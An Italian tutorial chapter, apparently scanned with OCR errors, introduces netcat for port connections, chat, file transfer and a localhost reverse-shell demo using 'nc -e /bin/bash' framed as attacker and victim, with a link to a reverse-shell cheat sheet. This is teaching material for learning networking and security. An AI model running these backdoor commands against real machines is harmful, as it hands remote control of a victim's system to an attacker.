9. Netcat: il coltellino svizzero delle reti 


Netcat è un tool (Open Source) a riga di comando, immancabile nel bagaglio di 
qualsiasi hacker, sistemista, o di chi lavora spesso con le reti. Non è a caso 
considerato il "coltellino svizzero delle reti (e della sicurezza)", questo perchè non 
svolge un compito specifico ma ha invece molteplici funzioni. 


Netcat consente La scansione di porte TCP e UDP, riuscendo a 
minimizzare La quantità deLLe tracce Lasciate, può essere utiLizzato 
come un cLient di posta, può simuLare un sempLice Web server 9 , 
può trasferire fiLe tra due macchine remote, e può addirittura 
instaurare una backdoor 10 . 

Netcat è essenziaLmente La versione potenziata di teLnet * 11 , che è 
ormai obsoLeto daL punto di vista deLLa sicurezza. 

Netcat switches: 

QueLLo che vedremo è soLo un utiLizzo base di netcat. 

❖ Connettersi a un host: 

5 ^ nc <indirizzoip_target> <porta> 

■ Es. nc 192.168.0.1 2222 

❖ Creare un socket per accettare Le connessioni (-L sta per 
Listen, ovvero sta in ascoLto, -p sta per port che infatti gLi 
andiamo a specificare) 

5 ^ nc -Lp <porta> 

■ Es. nc -Lp 4444 

❖ Eseguire un fiLe subito dopo aver ricevuto una connessione 

>- nc -Lp <porta> -e <nomefiLe> 


9 Applicazione software che, in esecuzione su un server, è in grado di gestire le richieste di trasferimento di 
pagine web di un Client, tipicamente un web browser. 

10 Consente di accedere a un software o a un sistema informatico, e di prendere il completo o parziale 
controllo del computer vittima. 

11 Programma (e protocollo di rete) che consente di collegarsi ad un computer remoto su Internet e di 
accedere ai relativi dati e servizi, trasformando il proprio elaboratore in un terminale in grado di impartire 
direttamente comandi. 
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■ Es. nc -lp 4444 -e /bin/bash 


Proviamolo! 


Apriamo 2 finestre del terminale, su un terminale ci metteremo in 
ascolto di una connessione, mentre sull'altro ci connetteremo. 


[lorissimonettì@localhost -] $ nc -lp 4444 

[lorissimonetti@localhost ~] $ nc localhost 4444 

l 

A sinistra abbiamo lanciato il comando nc -lp 4444 per metterci in 
ascolto sulla porta 4444, a destra invece ci siamo connessi utilizzando il 
comando nc localhost 4444. 

A primo impatto non vediamo comparire nulla su nessuna delle due 
finestre, ma proviamo a scrivere qualcosa. 

[lonssimonetti@localhost ~] $ nc -lp 4444 

Ciao ! 

I 

[lonssimonetti@localhost -] $ nc localhost 4444 
Ciao ! 

□ 


Scrivendo "Ciao!" dal terminale di sinistra (in ascolto) vediamo 
comparire lo stesso messaggio nel terminale di destra, a sua volta 
anche il terminale di destra può inviare un messaggio che verrà recepito 
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da quello di sinistra, da instaurare così una sorta di sistema di chat. 


[lorissimonetti@localhost ~] $ nc -Ip 4444 [lorissimonetti@localhost -] $ nc localhost 4444 

Ciao! Ciao! 

Ciao, dall'altra parte! Ciao, dall'altra parte! 

□ l 


Ora proviamo invece ad instaurare una Reverse Shell 12 


lorissimonetti@localhost ] $ nc -Ip 12345 [lorissimonetti@localhost ] $ nc localhost 12345 -e /bin/bas 

■“ □ 
iid=1000(lorissimonetti) gid=1000(lorissimonetti) gruppi=1000( 
orissimonetti),10(whGGl),36(kvm) contGSto=unconfinGd_u:unconf 
nGd_r:unconfincdt:s0-s0:c0.cl023 
>wd 

homG/lorissimonGtti 

/hoami 

orissimonGtti 


Il terminale di sinistra rappresenta l'attaccante con cui come prima, ci 
siamo messi in ascolto nc -lp 12345, a destra abbiamo invece la 
vittima che si connetterà a noi facendo partire la shell nc localhost 
12345 -e /bin/bash. 

Come possiamo vedere ora l'attaccante è in grado di poter lanciare 
comandi che vengono eseguiti sulla macchina vittima, e che 
chiaramente in questo caso è sempre la stessa. 


12 http://pentestmonkev.net/cheat-sheet/shells/reverse-shell-cheat-sheet. Si tratta di una Backdoor. Shell 
interattiva consente di eseguire i comandi del terminale sulla macchina remota (nel nostro caso sulla stessa 
macchina), la peculiarità della Reverse shell sta nel fatto che non saremo noi a connetterci alla macchina, ma 
sarà la macchina ‘vittima’ che si connetterà a noi, in modo da evitare un eventuale blocco della 
connessione da parte di un firewall, che solitamente è meno restrittivo con le connessioni in uscita. 
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Come ultima cosa, proviamo a trasferire un file. 


lori5simonetti@localhos lorissimo 

[lorissimonetti@localhost invia] $ cat file [lorissimonetti@localhost riceve] $ cat output.txt 

Ciao, Mondo! Ciao, Mondo! 

[lorissimonetti@localhost invia] $ nc localhost 12345 < file [lorissimonetti@localhost riceve] $ | 
[lorissimonetti@localhost invia] $ [] 


1. Nel terminale di sinistra, destinato ad inviare un file situato nella 
cartella "invia", creiamo un file di nome "file" contenente il testo 
"Ciao, Mondo!". 

2. Ora spostiamoci nel terminale di destra che deve ricevere il file, 
dove lanciamo il comando nc -lp 12345 > output .txt, in 
modo da metterlo in ascolto sulla porta 12345 e non appena 
riceve la connessione (contenente il file), scriverà ciò che viene 
inviato nel file output.txt. 

3. Torniamo nel terminale di sinistra e lanciamo il comando nc 
localhost 12345 < file da effettuare così la connessione a 
con quello di destra e inviando il contenuto del file "file" che gli 
abbiamo dato in pasto. 

4. Premendo invio, possiamo notare che la connessione si chiude. 
Ora nel terminale di destra lanciando il comando cat 

output. txt vediamo che il contenuto del file che è stato inviato 
e scritto con successo nel file "output.txt". 

Abbiamo quindi visto come trasferire file e contenuti semplicemente 
attraverso una connessione con netcat, e come avere a disposizione 
una Shell interattiva con la macchina vittima. 
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